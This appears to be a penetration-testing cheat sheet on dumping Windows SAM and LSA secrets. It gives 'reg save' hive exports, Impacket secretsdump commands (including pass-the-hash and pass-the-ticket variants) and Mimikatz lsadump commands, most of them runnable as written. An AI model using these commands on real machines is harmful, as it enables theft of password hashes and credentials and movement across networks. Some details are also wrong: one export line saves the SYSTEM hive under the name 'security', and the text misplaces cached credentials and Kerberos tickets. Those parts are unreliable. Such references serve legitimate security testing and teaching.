SAM (Security Accounts Manager) and LSA (Local Security Authority) are two important databases used in the security architecture of Windows operating systems.
The SAM database is a part of the Windows registry and stores information related to local user accounts and security policies. It contains data such as usernames, passwords (hashed), account status, and group membership. Windows uses SAM to perform local user authentication and enforce security policies on a per-machine basis.
The LSA database, on the other hand, is a component of the Windows security subsystem that provides security-related services to applications and other system components. It stores security-related information such as authentication credentials, security policy settings, and account lockout policies. The LSA database is responsible for enforcing security policies, authenticating users, and managing security tokens for applications and system services.
In summary, while the SAM database is primarily concerned with managing local user accounts and security policies, the LSA database provides a broader range of security-related services and is used by various components of the Windows operating system.
Hive
Details
SAM
Contains local cached credentials.
Security
Stores clear text credentials, password hashes, security tokens etc.
System
Store enough info to decrypt the SAM and LSA hives.
Obtaining the SAM and LSA database
To be able to decrypt the SAM database, we'll require the sam and system hive where the encryption key is stored.
To be able to decrypt the LSA database, we'll require the security and system hive where the encryption key is stored.
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\system security
Impacket's secretsdump is a Python tool used for extracting authentication credentials from Windows systems. It can extract password hashes from the Security Account Manager (SAM) database and Kerberos tickets from the Local Security Authority (LSA) database.
# Remote dumping of SAM & LSA secrets
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'
# Remote dumping of SAM & LSA secrets (pass-the-hash)
secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
# Remote dumping of SAM & LSA secrets (pass-the-ticket)
secretsdump.py -k 'DOMAIN/USER@TARGET'
# Offline dumping of LSA secrets from exported hives
secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
# Offline dumping of SAM secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL
# Offline dumping of SAM & LSA secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
Mimikatz is a powerful Windows post-exploitation tool that can extract sensitive information such as password hashes, plaintext passwords, and Kerberos tickets from memory on a compromised system.
# Local dumping of SAM secrets on the target
lsadump::sam
# Offline dumping of SAM secrets from exported hives
lsadump::sam /sam:'C:\path\to\sam.save' /system:'C:\path\to\system.save'
# Local dumping of LSA secrets on the target
lsadump::secrets
# Offline dumping LSA secrets from exported hives
lsadump::secrets /security:'C:\path\to\security.save' /system:'C:\path\to\system.save'
CrackMapExec (Python) can be used to remotely dump SAM and LSA secrets, on multiple hosts. It offers several authentication methods like pass-the-hash (NTLM), or pass-the-ticket (Kerberos)
